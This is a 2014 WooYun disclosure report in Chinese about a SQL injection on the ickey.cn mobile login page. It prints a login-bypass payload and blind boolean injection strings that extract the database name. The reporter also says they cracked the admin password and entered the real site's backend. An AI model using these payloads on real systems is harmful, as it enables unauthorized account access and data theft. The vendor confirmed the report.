漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-071788
漏洞标题:ICKey主站存在sql注入
相关厂商:ickey.cn
漏洞作者: s3xy
提交时间:2014-08-11 12:10
修复时间:2014-09-25 12:12
公开时间:2014-09-25 12:12
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-08-11: 细节已通知厂商并且等待厂商处理中
2014-08-11: 厂商已经确认,细节仅向厂商公开
2014-08-21: 细节向核心白帽子及相关领域专家公开
2014-08-31: 细节向普通白帽子公开
2014-09-10: 细节向实习白帽子公开
2014-09-25: 细节向公众公开
简要描述:
ICKey主站存在sql注入
详细说明:
经过测试,发现ickey主站有waf防止注入。
但是post注入是没有禁止的。
其实发现的过程是挺有意思的。
首先注册了个号test/admin888
在http://www.ickey.cn/mobile/?action=login 登录
我首先测试帐号处输入test' or '1'='1 密码输入123456
神奇的事情发生了,数据库把密码为123456的第一个用户登录上去了。
我们上首页正常登录该用户试试
无压力了,所以通过此注入可以登录任意密码的用户。
********************
这才是测试阶段,仅能证明登录任意密码的第一个用户。
下面我们测试sql注入。
********************
此注入点是post盲注
下面尝试猜解当前数据库名
test' and (length(database())>7)# 正常
test' and (length(database())>8)# 错误
判断当前数据库名为8位
and (select ASCII(SUBSTR(database(),1,1)))>104# 正常
and (select ASCII(SUBSTR(database(),1,1)))>105# 错误
判断第一位ascii是i
同理得出数据库名为ickeynew
再猜解当前用户
and (length(user())>15)# 正常
and (length(user())>16)# 错误
上工具
成功解密管理员密码,并登录后台。
测试时候已经是半夜2点钟。
维护人员居然很快就发现,并及时更改了密码,赞一个。
所以没办法发后台截图了。
漏洞证明:
1.帐号处输入test' and '1'='1 密码admin888 正常登录
2.帐号处输入test' and '1'='2 密码admin888 登录失败
修复方案:
主站的注入,危害不多说了。
维护人员尽快过滤吧
维护人员青检查日志,本人并未脱裤。
仅做安全测试,点到而已。
我是来求礼物的,摸摸大~
版权声明:转载请注明来源 s3xy@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2014-08-11 13:15
厂商回复:
谢谢,已通知相关部门处理
最新状态:
暂无